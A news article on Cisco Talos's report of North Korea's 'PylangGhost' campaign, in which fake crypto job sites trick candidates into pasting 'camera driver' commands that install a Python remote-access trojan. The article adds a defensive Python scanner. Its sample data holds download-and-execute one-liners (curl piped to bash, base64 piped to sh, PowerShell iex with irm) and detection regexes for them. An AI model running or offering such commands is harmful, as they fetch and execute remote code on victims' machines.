North Korea’s ‘PylangGhost’ Cyberthreat Exposed: Fake Crypto Job Sites Target Industry Workers


Published: 2025-06-20 06:13:18

Cisco Talos: New North Korean threat ‘PylangGhost’ targets crypto workers through fake job sites

Another day, another cyberattack—this time with Pyongyang's fingerprints all over it. Security researchers at Cisco Talos just unmasked 'PylangGhost,' a North Korean-backed campaign hunting crypto talent through poisoned job listings. Because what's more 2025 than hackers weaponizing LinkedIn?

How the scam works:

Fake recruitment portals promise lucrative blockchain gigs, then put candidates through a bogus skills test. The "camera fix" the recruiter asks them to paste into a terminal installs a Python-based remote access trojan, not a video driver. Classic social engineering, now with extra career-ruining spice.

Why crypto? Easy money:

Pyongyang's cyber-army has stolen over $3B in digital assets since 2018 (Chainalysis data). With crypto markets bouncing back, expect more 'help wanted' signs hiding digital pickpockets. Bonus irony: these scams thrive on the same hype that drives token pumps.

Security teams are scrambling to blacklist domains, but the playbook's familiar: socially engineered chaos, laundered through decentralized exchanges. Meanwhile, VCs still swear web3 will 'bank the unbanked.' Sure—after the DPRK finishes unbanking everyone first.

How do North Korean hackers catch their victims?

According to the report, the group lures its victims with fake job-interview campaigns built on social engineering. It stands up fake job sites that impersonate major crypto firms, including Coinbase, Robinhood and Uniswap.

Fake recruiters then walk victims through a multi-step process, inviting them to open fraudulent skill-testing websites that harvest their personal information.

While preparing for the fake interview, the user is prompted to grant the site access to their camera and microphone. At this point the fake recruiter asks them to copy and execute commands, supposedly to install updated video drivers. Those commands are the infection vector.

Once they run, the malware is on the device. It gives the attackers remote control of the infected machine and access to cookies and credentials from over 80 browser extensions.

These include password managers and cryptocurrency wallets such as MetaMask, 1Password, NordPass, Phantom, Bitski, Initia, TronLink and MultiversX.
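The copy-and-run step is the part of this chain a defender can actually see: whatever the lure says about video drivers, the pasted text has to be a download-and-execute one-liner of some kind. The Python below is an added example written for this page, not Cisco Talos's tooling and not PylangGhost indicators. It scans shell history or process command lines for those generic idioms (fetch piped into a shell, base64 decode piped into a shell, PowerShell fetch plus Invoke-Expression, archive unpacked and a Python interpreter launched in the same line). The sample history lines are constructed for the demo and the host `driver-update.example` is a placeholder.

```python
"""Heuristic scan for copy-paste 'run this to fix your camera' lures.

Added example for this page (not Cisco Talos's code, not PylangGhost IOCs).
Input: shell history or EDR process command lines. Output: one Finding per
line that matches a generic download-and-execute idiom.
"""
import re
import sys
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based index into the scanned input
    rule: str      # name of the heuristic that fired
    command: str   # the offending command line, stripped


_SH = r"(sudo\s+)?(ba|z|k|da)?sh\b"          # sh / bash / zsh / ksh / dash, not sha256sum
_PS_FETCH = r"(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)"
_PS_EXEC = r"(iex|invoke-expression)"

# (rule name, compiled regex). Case-insensitive so PowerShell casing is caught.
RULES = [
    # curl/wget output piped straight into a shell
    ("download-and-execute",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*" + _SH, re.I)),
    # inline base64 blob decoded and piped into a shell
    ("decode-and-execute",
     re.compile(r"base64\s+(-d|--decode)\b[^|]*\|\s*" + _SH, re.I)),
    # PowerShell: fetch remote text and Invoke-Expression it, in either order
    ("powershell-iex",
     re.compile(r"\b" + _PS_EXEC + r"\b.*\b" + _PS_FETCH + r"\b"
                r"|\b" + _PS_FETCH + r"\b.*\b" + _PS_EXEC + r"\b", re.I)),
    # archive unpacked and a Python interpreter launched on the same line:
    # the shape of a "driver fix" that is really a Python RAT dropper
    ("unpack-then-python",
     re.compile(r"\b(unzip|tar\s+-?x\w*)\b.*(&&|;|\|\|).*"
                r"\bpython(3(\.\d+)?)?(\.exe)?\b", re.I)),
]


def scan_lines(lines):
    """Return a Finding for every non-comment line that matches a rule."""
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        cmd = raw.strip()
        if not cmd or cmd.startswith("#"):
            continue
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append(Finding(line_no, name, cmd))
                break   # one finding per line is enough for triage
    return findings


# Constructed sample history (not real attacker commands); the host
# driver-update.example is a placeholder. Lines 2, 4, 5 and 7 should fire.
SAMPLE_HISTORY = [
    "git pull --rebase",
    "curl -fsSL https://driver-update.example/camera-fix.sh | bash",
    "echo aGVsbG8= | base64 -d",                       # decodes, never executes
    "echo Y3VybCBodHRwOi8vMTI3LjAuMC4xL3gK | base64 -d | sh",
    "unzip -o camera_fix.zip && python3 camera_fix/update.py",
    "curl -s https://api.example/v1/status | jq .",    # piped to jq, not a shell
    'powershell -nop -w hidden -c "iex (irm https://driver-update.example/fix.ps1)"',
    "tar xzf release.tgz",
]


def main(argv):
    """Scan a history file given on the command line, or the built-in sample."""
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_HISTORY
    findings = scan_lines(lines)
    for f in findings:
        print(f"line {f.line_no}: {f.rule}: {f.command}")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against `~/.bash_history`, `~/.zsh_history` or an export of process-creation events from your EDR. The rules deliberately key on the shape of the command rather than on domains or file names, since those rotate between campaigns; anything that fires is worth a look at what the user was doing at the time (a "recruiter" video call is the tell here).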

As previously reported in April, another North Korean hacking collective, Lazarus Group, has used similar methods to lure users: fake job applications that delivered at least three strains of malware linked to North Korean cyber operations.
